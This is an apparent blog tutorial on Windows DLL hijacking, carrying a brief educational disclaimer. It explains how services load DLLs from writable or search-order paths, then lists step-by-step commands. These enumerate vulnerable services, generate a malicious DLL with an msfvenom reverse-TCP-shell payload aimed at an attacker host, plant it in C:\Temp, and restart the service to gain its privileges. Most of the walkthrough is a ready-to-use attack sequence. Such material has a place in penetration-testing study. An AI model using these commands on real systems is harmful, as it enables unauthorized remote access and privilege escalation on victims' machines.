Skip to content
Disclaimer: This material is provided solely for educational purposes. You are fully responsible for how you use the information.
We do not encourage any kind of illegal or harmful activity.

INTRODUCTION

DLL Hijacking is a cyberattack that leverages the way Windows applications search and load Dynamic Link Libraries (DLLs). By exploiting how applications load DLLs, attacker can gain elevated privileges or execute arbitrary code.

HOW DLL HIJACKING WORKS

  1. Services in Windows load DLLs with the same privileges as the service. If attacker control the DLL, they can execute code with the service's privileges.
  2. Absolute Path Vulnerability: When a service loads a DLL from a writable path, attacker can replace it with a malicious one, causing privilege escalation.
  3. If an application can't find a required DLL, attacker can place a malicious DLL in a directory searched by Windows, leading to privilege escalation.
  4. Windows searches for DLLs in a specific order. Attacker exploit this by placing a malicious DLL in a location searched before the legitimate one.

STEPS TO IDENTIFY AND EXPLOIT INSECURE SERVICE EXECUTABLES

  1. Use winPEAS to list non-Microsoft services:
    .\winPEASx64.exe quiet servicesinfo

  2. Verify writable directories in the system PATH:
    sc qc dllsvc

  3. Check the service access permissions:
    .\accesschk.exe /accepteula -uvqc user dllsvc

  4. Set filters to monitor the specific service executable with Procmon:
    Procmon64.exe

  5. Filter out registry and network activities to pinpoint DLL-related errors.

  6. Monitor failed attempts to load the DLL, often defaulting to writable directories like:
    C:\Temp

  7. Use Metasploit to create a malicious DLL:
    msfvenom -p windows/x64/shell_reverse_tcp LHOST=[IP_ADRESS] LPORT=[PORT_NUMBER] -f dll -o hijackme.dll

  8. Place the malicious DLL in the target directory:
    move hijackme.dll C:\Temp

  9. Restart the service to load the malicious DLL:
    net stop dllsvc
    net start dllsvc